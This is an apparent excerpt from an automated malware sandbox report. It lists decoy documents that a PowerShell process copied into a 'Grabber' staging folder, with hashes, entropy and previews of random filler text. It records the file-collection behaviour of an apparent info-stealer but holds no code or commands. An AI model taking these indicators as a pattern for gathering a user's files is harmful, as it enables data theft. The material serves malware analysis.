                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL\EFOYFBOLXA.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696178193607948
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                      MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL\GRXZDKKVDB.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697358951122591
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL\NVWZAPQSQL.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6998645060098685
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                      MD5:1676F91570425F6566A5746BC8E8427E
                                                                                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL\PALRGUCVEH.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696508269038202
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                      MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                      SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                      SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                      SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\NYMMPCEIMA.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6957997909429325
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:kKnyV7BxweFQl79j+hRxUY//oWt/yeHEMcXJn25feaqrZZqW+LRJvy:kKnY7wGQlSxH/9kM0Jn25grZgRJa
                                                                                      MD5:4F49714E789620AEDB7B9565DC949466
                                                                                      SHA1:5917AC09E3D5074BFF8E1289865CAFF6403D1E82
                                                                                      SHA-256:A9D5D3D8BE1D9E0187DA4AF85AFF3E2D1D6DE977D13EDA76900C96D98A8F073B
                                                                                      SHA-512:61F147FA2B300AC2E3A42445F1283A47C805B756F36730CDCD4DB5A711BE43EFA471C7ECFB865908791852D1AAF365284BD4DE01F0EA0BF9DCD416A853C804E9
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:NYMMPCEIMABCZIWJTJBTGSCCAGUWVTYLYWSVBSDZXQVJYUDCVLRURABBOBVCVDMKRKSRCSPXNAWPZJIOBULMRNUUOMOQGMWJLMZDBRBKAATADQPXHJFNCLPVAYDJHNDQMYWKBXYCBZJQANHQXCJPZQWORFXISYXSVTGTQJXNOUHRMKMJWJYCVNYAJFLKQVPGEYIUPPSZIHLNRGNCVNQBEZHDSJLAAKTOQOPFKISQUVSYIJUTXMPMVSFBVQNNFUXQRBBZWPVQFKOIAVQQMWQKLBSRPGKOQWZJAMBIDYJLYFILNAEEJCLRGBXDTSTBTNJDUXNFJBEZUDHSQUEENVIJUBNKGOLASBWAZBYYZZCOGWIJLRICWMFOAHSZVHCPRGDQXQUHZNZAIBOSXNAEYXAGWDBIHQGHOMKGZVYJDFBRWFKGJWGGPPTKNYWOHJZEIWRXWBERKQREQFMJHAKYHJCBTJJONCVMKTRJZVEWZOAKRUZLPQOXEQLKYATRQESEWRXETALDGKSHWFGQVXVYWPZEUDKTVGFGTXHQNKYUTVLNVAJFDYFPLRACHLYNSSVZZIAKKEEENZFLNPGNCVKMHGOYMQEBOXNMEXNXHUPMZAMZZQVDPFGLUSJHKGQWGKDPXMSIYPGNIXUXSJQFAXJLLSOUEANCWYAHDTOQTEKVGNOWSZINVNYZYIYNTVHHTDVGBTBPYPINRBPJYKHMRFCGSMCNFESVFMQIFPOJDAJGZEYTMLYQIIYRBVNEZSIWWOKGVIVGLXAQUNYDTWHGEWOLDMZRPSOAJKFXVJJTTIAJVLZGIFIWTHVZZGQOVGNSYXTJVFSXNDQLHICPBSAZIKIPLGSRTCKFEGRKNLTONCJFACYIGQPYUHVPNPUUGOOGHBAMCKOGYKVNNBSVPYVHZVJCMTDSHLBWEDMSWSFZAIRFDEYBDVHTWHABAXCAQCTXQRIUHVQFAEPMNYIWIBWVEEZTZGQTPDYRFAGKUGAEBSQFYYQG

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\PALRGUCVEH.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696508269038202
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                      MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                      SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                      SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                      SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\QCOILOQIKC.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697125102277996
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:uVOXLU7xwK58ZsokCVVZGi4eW0ZFJVPNR+x:c7xR8mwGi4sbv+x
                                                                                      MD5:207485EFCE70435971C31586A1E4CF97
                                                                                      SHA1:245A410AEB767B099944A8E81F75FC9A4B270DFB
                                                                                      SHA-256:BF45E8FD687DC0E63FD40F32F2279152430579EDE044C3BB0852A1AC460D4B09
                                                                                      SHA-512:A7F01CBBAFE9EA12B4C820F5E1A107D4C6FBD57CFF41C4AC679485F2B7DAFA4E9148AF830A39A083EC866E988A8E279FEB39D5EB58593E75D22253BED4DEFA19
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:QCOILOQIKCUYMAHQLCLSCUGPPLVTJEARXPXBWFLOFHRVUSXLZVWHDQNKEMGPPQAGBLIPFAECDZNKKHITNQJASUXZAYMZIQCEHAQMCVZBMFUDBNQEKCBNCGMUWXDJLMJKVRKYBLRGNWGBGEVIGVROENGUXKJERNJSJJEMVLDKUXDFUWUPQNWUYRIEPUFOQKPDSZXXCKNQVBEAVMDMBRZSWYPCNALGHTDFWFNDXKSHXCRLYPVFVYVEOFRHUFZZGNIXSJQCPZGONOYWWUQLBEBGALPOGZBXJUYXTHWOKWNKJYPSELALXQYIKAHXCELBTKSQFTNYWBHRPQFULPLOCWEQAXEQNXOBIQOYFSEEZWHQQLZPBQOUMVZIMRWRLSPDKEBXSTPZLAGVYIORHCDBXTBHYOFKACXVGKKSIFHPOLDOQGIDQPFPVIPGUCGUCQLFFBYAGFJYFOMBUMPAHPQLDOHYAMKEGSDPXEYBQJUOWZOPFYRTLYUYDJHPLVEXBXUGVUEYIBUTUABUIHROFHZMLJUXWGZILWRHVKGOSZXXCIWGRGUZQDKQMTXRRWHDLJPPIRDALEIAYYTEEONIAELEISEOGNTDSALVOZDMFPLJSJMKJYMWGSKCTXHTLYYFJSXNZMDELRTJBNXSGAOEPKCPEEPFZKCAATOWHUWGQAEQNZHTKQEUCFRXVJWOGAEQDIWARNNFKCHEDRWTKEOVTURBKPDMQPPDCJGTYCTIRELHGRIRLWAPLCEHANSMGDZZYCXXDOTQVOSDZJAEBOTEVLSMHXCOWDPVQPSGDIDBAWUTDPIYPVBFSUMFBUYOPRXLECFHENURLSLKGPFWXDUFYOAKNTFKOYFUZEKLRZOLPYKMCKVZOIMDCCSGPQNCQXJOTJDKUQEPVHFKRSGZYJBNUHVTOEMNLTDXGZHTDQFQZCOULTNVZRAVLOIOVIKUTWPYLRJUCUDMYVYFWSBLJTJKMSJEIJXWYNPKGTYLKDAEVBUQUIJX

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\ZGGKNSUKOP.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6959554225029665
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                      MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                      SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                      SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                      SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\ZGGKNSUKOP.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6959554225029665
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                      MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                      SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                      SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                      SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPC